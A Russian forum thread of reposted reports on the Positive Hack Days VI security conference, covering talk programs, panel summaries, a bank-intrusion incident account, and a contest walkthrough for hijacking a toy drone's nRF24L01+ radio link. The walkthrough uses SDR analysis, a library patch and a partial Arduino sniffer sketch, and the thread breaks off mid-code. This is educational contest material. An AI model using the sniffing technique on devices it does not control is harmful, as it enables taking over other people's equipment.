В последние два года основная тема выступлений Андрея Масаловича — выявление и предупреждение вредного информационного воздействия. Его доклад «Выживший» входит в пятерку наиболее ожидаемых выступлений в программе PHDays VI. Андрей расскажет о том, как подготавливаются информационные атаки, как распознавать их на ранних стадиях и противостоять им. Проанализирует особенности восприятия и распространения информации в социальных сетях с использованием троллей и ботов. Рассмотрит метод экспресс-анализа социальных портретов участников массовых обсуждений — рядовых пользователей, политиков, медийных персон, подростков, вербовщиков и их жертв.

17 и 18 мая Мокси Марлинспайк, Рахул Саси, Пол Викси, Андрей Масалович, Джон Бамбенек и десятки других экспертов по информационной безопасности выступят на форуме Positive Hack Days VI в Москве. На сайте phdays.ru можно ознакомиться с предварительной программой мероприятия и выбрать лучший способ попасть на мероприятие.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Приглашаем принять участие в сессии пятиминутных выступлений на форуме PHDays. Расскажите о новой уязвимости или о проблеме в алгоритмах безопасности. Придумали концепт инструмента анализа безопасности или запланировали масштабное исследование? Поделитесь своими идеями с трибуны и найдите единомышленников.

Слушателям нравится формат Lightning Talk по нескольким причинам. Во-первых, это возможность влиться в интересный проект. Во-вторых, если тема скучная, а оратор плохо подготовился — долго терпеть не придется, через несколько минут на сцене будет уже новый докладчик.

Если вы хотите принять участие, о докладе надо заявить ведущему секции FastTrack либо на стол регистрации. Правила Lightning Talk просты:

  • ваше выступление длится 5 минут (1 или 2 слайда);
  • доклады не премодерируются;
  • лучшие докладчики получат приглашение на PHDays VII.
Международный форум по практической безопасности Positive Hack Days VI состоится 17—18 мая 2016 года в московском ЦМТ. На площадке можно будет увидеть, как атакуют ГЭС, взламывают сотовую связь, отключают вентиляцию в умном доме, выводят деньги из интернет-банкинга, — и узнать, как противостоять таким атакам.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Компания Positive Technologies в рамках форума Positive Hack Days VI (17—18 мая) проведет двухдневный семинар для разработчиков по созданию защищенных приложений Positive Development User Group. Цель мероприятия — повысить устойчивость бизнеса к растущим угрозам со стороны злоумышленников.

На семинаре будут рассмотрены все аспекты конструирования защищенных приложений, различные уязвимости веб-сервисов, эксперты Positive Technologies представят опыт анализа защищенности систем, используемых в различных отраслях, и результаты исследовательских работ, лежащих в основе анализатора защищенности исходного кода приложений PT Application Inspector.

Ежегодно специалисты Positive Technologies изучают сотни приложений — официальные сайты, электронные торговые площадки, системы документооборота, учета, дистанционного банковского обслуживания. Согласно исследованиям, проведенным экспертами Positive Technologies в 2015 году, 70% приложений содержат уязвимости высокой степени риска и 100% — средней.

Семинар построен таким образом, что каждая тема будет рассмотрена и с позиции атакующего, и с позиции защищающего. Эксперты рассмотрят примеры атак и возможные пути их развития, продемонстрируют практические приемы разработки защищенного кода и типовые ошибки.

Семинар пройдет в закрытом формате: чтобы принять участие, нужно заполнить форму и отправить заявку.

Авторы семинара

Владимир Кочетков — руководитель группы разработки системы анализа исходных кодов Application Inspector компании Positive Technologies. Специализируется на исследованиях в области защищенности приложений. Является разработчиком и администратором проекта rsdn.ru.

Тимур Юнусов — руководитель отдела безопасности банковских систем в Positive Technologies. Занимается исследованиями в области ИБ. Выступал на Black Hat EU, ZeroNights; активно участвует в развитии форума Positive Hack Days.

Программа семинара:

День первый (17 мая)

15:00

Что такоеPositive Development User Group
Философия AppSec
Базовые понятия
Причинно-следственные связи
Классификация уязвимостей, угроз и атак

Практика AppSec
Предметная область Application Security
Управление потоками данных
Инъекции
Раскрытие информации
Предварительная обработка данных

16:30

Кофе-брейк

16:45

Управление потоками операций
Race Condition и атаки на атомарность
Недостаточная проверка процесса
Контроль целостности потока операций
Подтверждение аутентичности источников

Управление доступом
Идентификация, авторизация, аутентификация, двухфакторные методы
Проектирование и реализация контроля доступа

День второй (18 мая)

15:00

Общие примитивы защищенной реализации предметных областей
Криптография
Типовые ошибки проектирования и использования средств криптографии
Самодельная криптография
Побочные каналы
Высокоуровневые криптобиблиотеки
Случайные числа
Seed racing
PRNG
Хеширование и подписи
Атака расширения хеша
Хеширование паролей
Шифрование с закрытым ключом
Padding Oracle
Шифрование с открытым ключом

16:30

Кофе-брейк

16:45

Инфраструктура
Защита транспортного уровня
Ошибки использования TLS
Практики этапа развертывания
Принцип трех D
Для чего нам все это знать и что такое PT Application Inspector
Заключение

Про меня походу... :websmiles_47:
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
До окончания продажи билетов остался один день (13 мая).

Можно ли защитить предприятия и транспорт от угроз четвертой промышленной революции, известной как Индустрия 4.0? Придет ли рынок ИБ к сервисной модели? Не пора ли выбрасывать антивирусы и IDS на свалку? Станет ли SIEM ответом на все вопросы? Как вычислить инсайдера?..

Эти и другие темы войдут в деловую программу международного форума по практической безопасности Positive Hack Days VI, который состоится 17 и 18 мая 2016 года в Москве. В 2016 году ожидается более 4000 участников из более чем 700 организаций из 20 стран мира. Две трети из них — это первые лица компаний, представители государственной власти, IT-директора и руководители ИБ-отделов крупнейших международных компаний.

img110516.jpg


Первый день

С какими ключевыми проблемами при обеспечении информационной безопасности сталкивается бизнес? Что готовы предложить разработчики средств ИБ для их решения? Какова роль государственного регулирования в этом процессе? Эти и другие вопросы обсудят участники пленарного заседания «От кого зависит безопасность. Очная ставка» — представители государственных структур, CISO и CIO компаний-заказчиков, разработчики — с 11 до 12 часов в зале «Амфитеатр».

В том же зале с 13 до 14 часов на сцену выйдут практикующие вайтхэты. В рамках секции «Хакерская правда: зачем ломаете?» они поговорят об эффективном привлечении новых исследователей (о развитии ИБ-департаментов, аутсорсинге, bounty-программах) и попробуют предсказать — как будет выглядеть процесс поиска уязвимостей лет через 10 лет. Модерировать дискуссию будет директор по развитию Positive Technologies Борис Симис.

Одновременно в зале «А» соберутся известные блогеры и журналисты, которые пишут об информационной безопасности. Нужно или не нужно освещать инциденты безопасности? И если освещать — то как повысить качество журналистики в этой специфической и сложной области? Существуют ли независимые ИБ-издания? Возможны ли в российской прессе не только горячие новости о взломах, но и лонгриды? Как прессе и экспертам найти общий язык, чтобы публичный разговор о безопасности стал инструментом для ее обеспечения? Секцию «Разговоры по ИБ: "совершенно секретно" или "срочно в номер"?» будут вести представители Positive Technologies — заместитель директора центра компетенции Алексей Качалин и PR-менеджер Юлия Сорокина (13:00—14:00).

С 14:00 до 15:00 в «Амфитеатре» можно будет послушать Джейсона Шерка о программе Microsoft Bounty и уязвимостях стоимостью 100 000 долларов или переместиться в зал «Селигер», где состоится один из самых ожидаемых докладов — «Целевые атаки: прицелься первым» Владимира Иванова и Сергея Гордейчика. Эксперты расскажут об эффективности существующих подходов к защите от целевых атак, о способах обхода песочницы и о том, пора ли вовсе отказаться от IDS и антивирусов.

Ближе к вечеру (с 16:00 до 18:00) пройдет секция «Следующий виток противостояния: сервисы ИБ как ответ на новые угрозы и вызовы». Представители компаний Positive Technologies, «Лаборатория Касперского» и «Инфосистемы Джет» попытаются понять, готовы ли заказчики покупать ИБ-сервисы, рассмотрят преимущества и недостатки новых услуг по сравнению с коробочными продуктами, поговорят о подготовке специалистов, оказывающих такие услуги.

Постарайтесь также заглянуть в зал «А» с 17 до 18 часов: там ожидается серия выступлений Lightning Talk. Любой желающий может за пять минут поделиться своими идеями с трибуны, коротко рассказать о своей работе, о новой уязвимости или о проблеме в алгоритмах безопасности, о разработке нового инструмента анализа или о планах масштабного исследования. Основная цель таких выступлений — найти единомышленников. Модерировать блиц-доклады будут Андрей Петухов с ВМК МГУ и руководитель отдела образовательных программ Positive Technologies Евгений Миньковский.

Второй день

За год до появления iPhone половину рынка мобильных телефонов занимали Nokia и Motorola. До Google самыми популярными поисковыми системами были MSN, Lycos, Excite и Yahoo. Появится ли в сфере ИБ технология, способная устранить старых лидеров со сцены? 18 мая бизнес-программа форума откроется секцией «Технологии защиты и нападения — 2016: кто совершит прорыв». Свои прогнозы представят Тимур Юнусов, Дмитрий Курбатов и другие эксперты. Зал «Амфитеатр», 10:00—11:00.

С 11 часов можно переместиться в пресс-зал. Там пройдет двухчасовая секция «Кибербезопасность промышленных систем: пора решать проблемы!» (модерирует Иван Мелехин). Сращивание промышленных и IT-систем в Индустрии 4.0 не оставляет сомнений, что технологические системы будут подвергаться все более ожесточенным атакам. О своем опыте расскажут гости, представляющие ведущих российских и мировых производителей систем ИБ, систем автоматизации и крупнейшие промышленные предприятия.

Параллельным курсом — с 12 часов — в «Амфитеатре» будет выступать директор Microsoft Europe по кибербезопасности Ян Нойтце: на его доклад «Контроль кибервооружения: разработка норм безопасности» мы советуем обратить самое пристальное внимание.

В 13:00 в том же зале «Амфитеатр» стартует секция «ОколоИТ». Нешуточную конкуренцию ей составит доклад Михаила Емельянникова «Безопасность бумажная и техническая: им не жить друг без друга», который начнется одновременно в пресс-зале. Очень часто техническую безопасность, то есть анализ защищенности, пентесты, внедрение средств защиты, называют реальной безопасностью, противопоставляя ее безопасности «бумажной». Докладчик на практических примерах покажет, что в действительности эти две «безопасности» дополняют друг друга.

В 14:00 в пресс-зале начнется секция, посвященная проактивным методам образования в нашей отрасли. Как рождаются звезды ИБ и возможно ли ускорить их появление? Какие новые специальности появятся через пять лет? Разговор будет посвящен современным методам обучения специалистов по киберзащите, технологиям выявления талантов — и образовательным программам, которые заставят любого человека, далекого от инженерных наук, влюбиться в информационную безопасность.

С 15 часов перемещаемся в зал «Селигер», где Алексей Лукацкий будет арбитром в двухчасовой дискуссии «SIEM или не SIEM, вот в чем вопрос». Для чего нужен SIEM и какие задачи он решает на самом деле? Есть ли у SIEM-систем будущее? Каково реальное положение дел в сегменте SIEM в России и за рубежом? В чем основные сложности управления событиями? Приходите и высказывайтесь.

В зале «А» тем временем пройдут два доклада. С 15:00 до 16:00 Сергей Кавун в выступлении «Аспекты деятельности инсайдеров на предприятии» представит способ выявления внутренних шпионов на любом предприятии. С 16:00 до 17:00 на сцену выйдет Валерий Щепак, чтобы рассказать о проблемах в обеспечении безопасности магазинов, ресторанов, офисов, банков, коттеджей в докладе «Пультовая охрана: вектор атаки».

В 17 часов перед гостями форума снова встанет трудный выбор. В зале «А» будет выступление Андрея Масаловича, а в «Селигере» — Альфонсо де Грегорио. Андрей Масалович расскажет о том, как подготавливаются информационные атаки, как распознавать их на ранних стадиях и противостоять им. Выступление Альфонсо де Грегорио посвящено рынку эксплойтов, его участникам, деятельности брокера уязвимостей нулевого дня — и соответствующим аспектам деловой этики.

Полное расписание шестого форума PHDays — на официальном сайте: phdays.ru/program/schedule

Главные принципы Positive Hack Days — минимум рекламы и максимум полезных знаний в докладах и на семинарах, неформальное общение «пиджаков» и «футболок» за круглым столом, захватывающие конкурсы и энергичная атмосфера исследовательского полигона. Организатор форума — компания Positive Technologies.

Партнеры мероприятия — «Лаборатория Касперского», Axoft, «КРОК», Cisco, Check Point, «ИнфоТеКС», IBS, Qlik, ANGARA, MONT, «НАГ» и ICL.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Печаль, засунули в маленький "А" зал интересные темы,.. а в него не пробиться,.. а если и пробиться, то там очень душно как в парилке... Не зачёт за такое.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Пока сам еще не созрел на написание отчёта об поездке, выложу обзор от организаторов:
phdays2016_day2_1.jpg


4200 человек из разных стран мира стали свидетелями живого и несколько безумного праздника под названием Positive Hack Days VI. За два дня на площадке произошли сотни событий. На первый взгляд, хакеры чувствовали себя полными хозяевами положения. На деле — в условиях максимальной защиты никто не продвинулся дальше периметра DMZ.

Возможно, через несколько недель или месяцев город все равно бы пал. Такую защиту не взламывают кавалерийским наскоком. Но зрители не могли наблюдать за растянутой во времени целенаправленной атакой. Они хотели видеть, как топят поселок и жгут провода ЛЭП. Для повышения зрелищности решено было немного снизить уровень безопасности, отключив часть систем. И вот тут все увидели, что такое недостаточное внимание к ИБ. Хакеры использовали любую оплошность: успешно атаковали GSM/SS7, отключали системы умного дома, удаляли резервные копии важных систем, выводили деньги из ДБО.

Форум наглядно показал, что бывает с незащищенной критической инфраструктурой. Специалисты по информационной безопасности в силах обеспечить очень высокий уровень защиты без нарушения технологического процесса — но развернуться так, как на PHDays, им дают очень редко. После отключения средств защиты нападающие проникли в технологическую сеть АСУ через корпоративную, атаковали физическое оборудование системы, взломали ГЭС, провели сброс воды, отключили линии электропередачи.

Так или иначе, захватить город CityF целиком — и выиграть соревнования — ни одной команде хакеров не удалось. Подробные райтапы и итоги конкурсов ожидаются совсем скоро, а сейчас мы расскажем о нескольких выступлениях второго дня.

Правила войны
«На Positive Hack Days потрясающая аудитория. Я был очень впечатлен», — так начал свой доклад директор Microsoft Europe по кибербезопасности Ян Нойтце, приехавший в Москву рассказать о разработке норм безопасности в области международных киберконфликтов. Оказывается, у Microsoft есть сформированная позиция по вопросу ведения «бесшумных» войн, что, впрочем, не должно удивлять: бюджет компании сравним с валовым продуктом некоторых стран. По словам Нойтце, кибератаки обходятся бизнесу в 3 трлн долларов. Количество взломов за прошлый год выросло на 78%, данные 160 млн пользователей были украдены. Среднее время обнаружения взлома составило 229 дней.

Согласно данным Нойтце, правительства 16 стран уже декларировали использование оружия кибернападения, а 45 заявили об активных мероприятиях по киберзащите. Около 100 стран сейчас разрабатывают законодательство для своего киберпространства. «Главное — это критическая инфраструктура, — заявил Нойтце. — В законодательстве каждой из стран должно быть четко сказано, что спецслужбы и военные не имеют права атаковать эту сферу. Это грозит глобальной катастрофой».

phdays2016_day2_2.png


Атаки на корпоративную почту выросли на 270%
На секции «Технологии защиты и нападения — 2016: кто совершит прорыв» ведущие эксперты Positive Technologies Expert Security Center рассказали о последних значимых событиях в сфере защиты и нападения.

Дмитрий Скляров поделился новостями из мира реверс-инжиниринга. Среди прочего, рассказал о найденной уязвимости в системе защиты информации Secret Net Studio. Ее эксплуатация позволяет злоумышленникам повысить свои привилегии с гостевого доступа до администратора. Скляров отметил, что на данный момент не проводятся серьезных исследований сертифицированных продуктов, поэтому необходимо стимулировать производителей отдавать ПО на тестирование независимым исследователям и не ограничиваться только сертификацией ФСТЭК.

Дмитрий Курбатов считает, что не стоит полагаться на мобильную связь. Он представил результаты исследований защищенности сетей SS7, проведенных в 2015 году Positive Technologies. Статистика неутешительна: каждая мобильная сеть уязвима. В 89% случаев возможен перехват входящего SMS-сообщения, в 58% случаев — определение местоположения абонента, а в 50% — прослушивание звонков. Так, перехват входящих SMS-сообщений может быть использован для получения доступа к аккаунту мессенджера и электронному кошельку.

Одной из тенденций последнего года стали атаки с компрометацией корпоративной почты. По данным ФБР, их число выросло на 270%. В среднем ущерб от атаки на жертву составляет 25—75 тыс. долл. Подобной атаке подверглась и компания Positive Technologies. О подробностях инцидента рассказал Владимир Кропотов.

«Банки должны регулярно проводить анализ защищенности своих мобильных приложений, — считает Артем Чайкин. — Многие мобильные банковские приложения неправильно реализовывают работу с данными, которые получают». Он рассказал слушателям об эволюции вредоносного ПО и нюансах механизмов защиты пользователей банковских приложений.

Heartbleed, Shellshock, Ghost, Badlock — это неполный список уязвимостей, которые стали брендом. Не только разработчикам интересно внимание прессы. Появился своего рода тренд, когда исследователи придумывают целую пиар-компанию, чтобы рассказать о найденных уязвимостях. Но какие из них действительно критически опасные, а про какие можно сказать «много шума из ничего»? Разбирался в этом вопросе Арсений Реутов.

«Ваши данные могут утечь практически бесплатно, если вы используете уязвимое ПО», — уверена Юлия Воронова. По словам эксперта, злоумышленники редко атакуют конкретного заказчика, в основном они отталкиваются от уязвимостей в продуктах. Хакеры находят уязвимости, применяют эксплойты и только потом ищут пользователей уязвимых продуктов и атакуют их. «Но не все так плохо, как раньше. Защита перестает быть догоняющей и становится опережающей», — подытожила Юлия.

SIEM или не SIEM, вот в чем вопрос
phdays2016_day2_3.png


Алексей Лукацкий собрал представителей ведущих разработчиков систем SIEM, чтобы разобраться в предназначении продуктов этого класса. Вопросы были поставлены максимально жестко. Действительно ли SIEM приносит пользу или является очередной «вытягивалкой» денег из заказчиков? И чем отличаются их продукты. На секции собрались Евгений Афонин (HP ArcSight), Олеся Шелестова (основатель RUSIEM), Владимир Бенгин (MaxPatrol SIEM), Владимир Скакунов (Splunk), Роман Андреев (IBM QRadar).

Алексей Лукацкий привел данные опроса за 2014 год, который проходил среди 800 компаний из разных стран мира в 30 отраслях, внедривших SIEM. 74% компаний ответили, что SIEM никак не повлиял на уровень безопасности: число инцидентов не уменьшилось. «Заказчики нередко ожидают, что SIEM сработает как серебряная пуля, что, будучи как-то установленной, система что-то им поймает, – прокомментировал результаты опроса Роман Андреев. — Не исключено, что у трех четвертей респондентов просто не было понимания, что им надо ловить». В зале заметили, что в задачи SIEM входит выявление инцидентов и их расследование, а не влияние на количество опасных событий. Евгений Шумский из IBM предложил смириться с этими цифрами как с неизбежным злом, вызванным повышенной сложностью продуктов данного класса: «Системы SIEM настолько многообразные существа, что каждый заказчик использует их по-своему. Применяют в качестве антифрод–систем, вычисляют KPI службы безопасности, автоматизируют выявление инцидентов. Для некоторых компаний SIEM — это просто необходимость раз в месяц зайти в дашборд и посмотреть, что происходило на маршрутизаторе».

«Я не соглашусь с цифрами опроса, — заявил Владимир Бенгин (Positive Technologies). — Ситуация еще хуже. За последние полгода я обошел около 100 заказчиков. Мы внедрили 15 проектов MaxPatrol SIEM и провели десятки пилотных проектов. Почти везде, куда я приходил, SIEM уже был. Он лежал на полочке. По моей статистике, эффективно работает одна из десяти SIEM-систем, так как системы этого класса продают только функционал. У кого больше сравнительная таблица — тот и победил. Когда я выбираю машину, этих опций гораздо меньше. Главная ошибка производителей — они не продают экспертизу. По моему опыту, системы SIEM работали только в тех нескольких компаниях, где был сформирован отдел из десятка специалистов по безопасности. Данный подход в SIEM-системах нам не нравится. Он не работает. Поэтому Positive Technologies пошел по другому пути, сделав систему, способную работать практически из коробки. В нашей парадигме SIEM — лишь один из кирпичиков будущей платформы».

Преступников можно вычислить по доменам
Аналитик угроз информационной безопасности Fidelis Cybersecurity Джон Бамбенек выступил на форуме с докладом «Выявление инцидентов безопасности путем эксплуатации свойств отказоустойчивости инфраструктуры злоумышленника». Он привел примеры техник, которые используют злоумышленники, рассказал про алгоритмы генерирования доменных имен. Существуют такие закономерности, когда злоумышленники регистрируют большое количество доменов или сервисов снова и снова. В контексте расследования, зная закономерности их поведения, можно отслеживать преступника до тех пор, пока он не ошибется. «Преступник должен быть удачлив всегда. В долгосрочной перспективе это сложно. Чем больше они действуют, тем больше вероятность ошибки», — считает Джон. Аналогичную тему мы затронули в блоге Positive Technologies на Хабре.

Андрей Масалович об отравленной капле
Большой интерес вызвал доклад Андрея Масаловича «Выживший». Он рассказал, как подготавливаются информационные атаки. Целый арсенал средств информационного воздействия используется в «войне за мозги». В частности, в дуэте тролля и бота теперь новый игрок — Фея с пипеткой. Традиционный рынок живет по модели трехмерного взрыва. Искусственные информационные всплески действуют по аналогу двумерной волны: капля упавшая на воду, дает круги, а если она попадет в хорошее место, то дает большую волну. Так работает и Фея с пипеткой, которая капает в нужное место одну отравленную каплю.

Пожалуй, самой интригующей частью выступления стала демонстрация примеров социальных портретов участников массовых обсуждений — политиков, медийных персон, обычных пользователей, вербовщиков и их жертв. Глядя на эти карты, невольно содрогнешься: даже если человек не раскрывает информацию о себе в своем аккаунте, его все равно можно вычислить, просто изучив второй круг его знакомых. Естественно, подобный метод экспресс-анализа социального портрета используется и в целях безопасности, что на примере портретов экстремистов и показал Масалович.

Этика продавца уязвимостей
phdays2016_day2_4.png


Выступление Альфонсо де Грегорио было посвящено рынку эксплойтов, его участникам, деятельности брокера уязвимостей нулевого дня — и соответствующим аспектам деловой этики.

«Однажды японский коллега задал мне один щекотливый вопрос, — рассказывает Альфонсо. — Что я думаю о моральной стороне такого процесса, как торговля информацией об уязвимостях и эксплойтах нулевого дня? Признаться, в тот момент этическая сторона меня волновала гораздо меньше экономической. Интереснее для меня был вопрос, кто виноват больше: те, кто эксплуатируют уязвимости, или разработчики некачественного софта?»

Альфонсо сформулировал этику торговца уязвимостями. Первое правило: не сотрудничать с компаниями, которые замечены в нарушении человеческих прав. Второе правило: не угрожать здоровью людей: например, не продавать уязвимости в медицинском оборудовании. Точно также нельзя торговать украденной инсайдерской информацией. Третье правило: избегать конфликта интересов. Еще один запрет касается излишней эксплуатации: продавец должен указывать максимальное число атак или целей. Кроме того, согласно этической конструкции Альфонсо де Грегорио, нельзя играть за обе команды в одном матче, то есть помогать и атакующим, и защитникам.

200 долларов за минуту
phdays2016_day2_5.png


Сергей Голованов из «Лаборатории Касперского» рассказал о происшествии в одном из банков, когда команду специалистов по безопасности ЛК вызвали со словами «Приезжайте поскорее. Час не потерпим. Каждая минута стоит нам 200 долларов».

По пути в банк мы немножко нервничали, объезжая пробки. Было подозрение, что услышали какой-то «маркетинговый булшит» — озвученная цифра представлялась нам художественным преувеличением. По приезду оказалось, в системе засел crontab. Все так и было: каждую минуту 200 долларов улетали неизвестному адресату. И такие транзакции осуществлялись в течение нескольких недель.

После этого началась работа. В банке стоял сервер на Linux с открытым доступом по SSH. Сервер смотрел напрямую в процессинг. Общение между банком и процессингом шло через HTTP с помощью POST-запросов. Эти запросы определяли, куда переводить деньги, с какого счета и прочее. Как банк заметил неправильные транзакции? Представьте: сидит такой специалист процессинг-центра ночью. Тишь да гладь, никаких транзакций. И только один банк каждую минуту отправляет 200 долларов. Из процессинг-центра позвонили в банк. Ребят, что вы делаете? Банкиры проверили и очень удивились. Они этого не делали. Скрипт crontab просто по «курлу» отправлял деньги.

Позвали админа и спрашиваем у него пароль для SSH. Пароль оказался Sonic17. Посмотрели логи авторизации и видим, что ребята брутфорсили пароль тремя попытками в неделю. У них это заняло два месяца! Злоумышленники выяснили базовое слово пароля, а потом начали перебирать цифры. Делали они это по субботам, поэтому мы знали, что это не евреи. Начали искать точку входа. Нашли. На сайте онлайн-банка, обслуживающего юридических лиц, был найден скрипт info–.asp. Он ничем не отличался от info.asp. Единственная разница — внизу была строка, отправляющая SQL-запрос, который сразу исполняется на базе данных банка. Вначале решили, что это ошибся разработчик. Служба безопасности уже взяла паяльник и начала его искать. Но мы их попросили подождать и стали разбираться со скриптом, который делал запрос к базе онлайн-банка. После этого на этой базе начинал работать exe-файл, который делал туннель. Посмотрев на этот путь, можно было выяснить весь список использованных троянов: Meterpreter и Mimikatz в PowerShell, Powerpreter в obvious и PuTTY plink в whitelisted. Запросы шли от веб-приложения сквозь всю корпоративную сеть!

Целиком доклад Сергея «Copycat effect. От киберразведки до уличной кражи» и десятки других выступлений можно посмотреть на на сайте форума.

За подробностями Positive Hack Days VI можно следить в твитере по хэштегу #phdays.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Пока не нашел времени описать свою поездку, выложу статью про конкурс на PHDays VI

В этом году на PHDays был представлен новый конкурс, где любой желающий мог перехватить управление квадрокоптером Syma X5C. Производители часто полагают, что если они используют не IP-технологии, а какой-нибудь другой беспроводной стандарт, то можно не думать о защищенности. Как будто хакеры махнут рукой, решив, что разбираться с чем-то, кроме IP, — это слишком долго, сложно и дорого.

Но на самом деле, как мы уже много раз упоминали, SDR (software-defined radio) — отличный инструмент для доступа в мир IoT, где уровень вхождения определяется уровнем добросовестности производителя IoT-решений. Однако даже не имея SDR можно творить чудеса, пусть и в ограниченном пространстве частот и протоколов.

Цель — перехватить управление дроном.

Входные данные:

  • диапазон управления дроном: 2,4 ГГц ISM,
  • управление осуществляется модулем nRF24L01+ (на самом деле — его клоном BK2423).
Средства (выдавались желающим): Arduino Nano, nRF24L01+.
Результат — угонщик получил Syma X8C в подарок.

Так как среди желающих угнать наш дрон оказались уже подготовленные люди, имеющие в арсенале HackRF, BladeRF и другие серьезные игрушки, мы опишем два метода — SDR и непосредственно nRF24L01+.
Путь самурая — SDR
Первым делом необходимо найти каналы, на которых работает данный пульт. Но перед этим стоит пробежаться по даташиту, чтобы понять, что вообще искать. Первое, что нам необходимо, это организация частот.

33593101a0a84649b6ef047eba086f1e.png


Теперь мы знаем, что всего имеется 126 каналов с шагом в 1 МГц. Еще полезно было бы узнать ширину канала и битрейт, на будущее.

ddc722b48dd34a11ab59f28bebc3eb36.png


Вообще можно все сделать и без этих знаний, ведь далеко не всегда известно, из чего состоит передатчик. Итак, запускаем сканер спектра. Мы используем UmTRX и максимально возможный для него bandwidth — 13 МГц.

e18006df56804492885563ac8ca33fb2.png


8e5b5c19f8c14d4eae725148987fc87b.png


50693868c89c441ea6733cf7455dbdff.png


Мы не стали приводить скриншоты всего спектра, но как найти подобные данные в радиоэфире — должно быть понятно. Можем увидеть, что с определенной периодичностью данные появляются на 25, 41, 57 и 73 каналах.

Несмотря на то, что даташит однозначно указывает модуляцию, в жизни у нас не всегда есть даташит к перехватываемому девайсу. Поэтому собираем простейшую схему в GNU Radio и записываем любой из найденных каналов.

744534cf2162460c9ec772ce737dae75.png


Похоже, что bandwidth <= 800 КГц; согласно даташиту, это значит, что битрейт — 250 Кбит/с.

Теперь мы хотим посмотреть на записанные данные; запускаем baudline, в котором открываем записанный файл с правильными параметрами, — и видим нечто подобное:

e8a3b7228aa648d289ca084315790b9d.png


Выбираем один из подсвеченных пиков и открываем окно waveform.

7de5fa9aef1e42779ef5c82a5f4fc9dd.png


Вверху видим записанный сигнал; похоже, мы все сделали правильно, по переходам фазы становится очевидно, что это FSK/GFSK-модуляция.

Далее нам необходимо поставить демодулятор и немного отфильтровать лишнее.

a3049e3dcca24252b15582d6ab46b4c5.png


Открываем результат, картина выглядит иначе, теперь находим темную полосу и открываем waveform.

dec8527aa84e47ec81d9f4db8b02b84b.png


Фактически дело сделано, высокий уровень — единица, низкий — ноль. А по таймлайну можно определить период импульса и посчитать битрейт.

В самом начале передатчик настраивается на частоту передачи и передает только несущую, затем идет преамбула, состоящая из последовательности 0 и 1, в разных чипах она может отличаться как длиной, так и содержанием, в nRF24L01+ она составляет 1 байт 0xAA или 0x55, в зависимости от старшего бита адреса, в нашем случае преамбула 0xAA. Затем идут байты адреса, в nRF24L01+ адрес может составлять от 3 до 5 байт (забегая вперед: это не совсем так).

0b608b60295746119a203de18536eaf0.png


Теперь мы знаем адрес (0xa20009890f). Для дальнейшего анализа необходимо сделать небольшую автоматизацию, например так:

4a3ee0b127c64537a53f4a1f6173dfc5.png


На выходе получится файл, состоящий из последовательности 0 и 1:

$ hexdump -C test3.raw



Один из наших пакетов можно найти по смещению 0x5e25:

f6f89779d0e8409288763ef17a09734a.png


Что с этим делать дальше — каждый решит для себя сам, но необходимо подобрать длину пакета и тип используемой CRC. Мы написали утилиту, которая анализирует файл и пытается найти преамбулу, после которой пытается подсчитать CRC для разных вариантов длины payload и адреса двумя разными способами (см. даташит). У нас получилось так:

b25ac454fead45db93a6c885aeb945d9.png


Однако позже пришло понимание, что Python годится только для анализа в офлайне, а «переваривать» данные в реальном времени с битрейтом даже 250 Кбит/с весьма проблематично, не говоря уже о более высоких скоростях. Так родилась вторая версия на C, которая работает в режиме реального времени.

59494aa3fdab4b93ab3af68bea20f8c1.png


Итак, имея payload, остается разобраться уже в самом протоколе Syma.

Путь нищеброда — Arduino и nRF24L01+

46ca18c40563430f845468baad7e7f59.png


Этот способ, в отличие от описанного выше, не требует практически никаких знаний в области радио, и стоит крайне дешево (Arduino — 2 $, nRF24L01+ — 1 $ и примерно столько же на провода mini-USB и DuPont), однако требует некоторой смекалки и навыков гугления. Именно его участникам конкурса мы и предлагали повторить.

Основная проблема в том, что nrf24l01+ не имеет promiscuous режима. Однако сам модуль имеет несколько странных особенностей, первая — в даташите есть интересная вещь:

805d295271c2430d8da45f719b05c45f.png


Если выставить этот регистр в «00», то адрес будет 2 байта. Далее есть еще одна интересная особенность: обычно преамбула передается и используется для того, чтобы приемник мог подстроиться под передатчик, именно для этого чаще всего в качестве преамбулы передается последовательность нулей и единиц. Вторая особенность модуля nRF24L01+: он не ищет преамбулу и никак ее не использует, он ищет адрес, который записан в качестве принимаемого. Если посмотреть на передаваемый сигнал на скриншотах выше, можно также заметить, что перед началом передачи преамбулы передатчик вещает несущую; опытным путем было выявлено, что чаще всего nRF24L01+ воспринимает ее как 0x00 (иногда как 0xFF, реже как случайный байт). Таким образом, используя эти недокументированные особенности мы можем перевести nRF24L01+ в promiscuous mode — установив длину адреса в 2 байта, а сам адрес как 0x00AA или 0x0055. В одном из вариантов мы будем получать данные, сдвинутые на 1 бит. Кроме того, можно принимать данные без проверки CRC.

Теперь у нас есть все необходимые теоретические знания. Используем библиотеку RF24 (github.com/TMRh20/RF24), хотя в ней есть недостаток: в файле RF24.cpp в функции

Код:
void RF24::setAddressWidth(uint8_t a_width){
    if(a_width -= 2){
        write_register(SETUP_AW,a_width%4);
        addr_width = (a_width%4) + 2;
    }
}

следует удалить проверку валидности:

Код:
void RF24::setAddressWidth(uint8_t a_width){
    a_width -= 2;
    write_register(SETUP_AW,a_width%4);
    addr_width = (a_width%4) + 2;
}


Теперь пишем небольшой скетч для Arduino (данный пример для Mega, но будет работать на любой другой, нужно просто поменять CE_PIN, CSN_PIN на свои):
Код:
#include <SPI.h>
#include <nRF24L01.h>
#include <RF24.h>
#include <printf.h>

#define CE_PIN  53     /// Change it for your board
#define CSN_PIN 48     /// Change it for your board

RF24 radio(CE_PIN, CSN_PIN);

const char tohex[] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
uint64_t pipe = 0x00AA;

byte buff[32];
byte chan=0;
byte len = 32;
byte addr_len = 2;

void set_nrf(){
  radio.setDataRate(RF24_250KBPS);
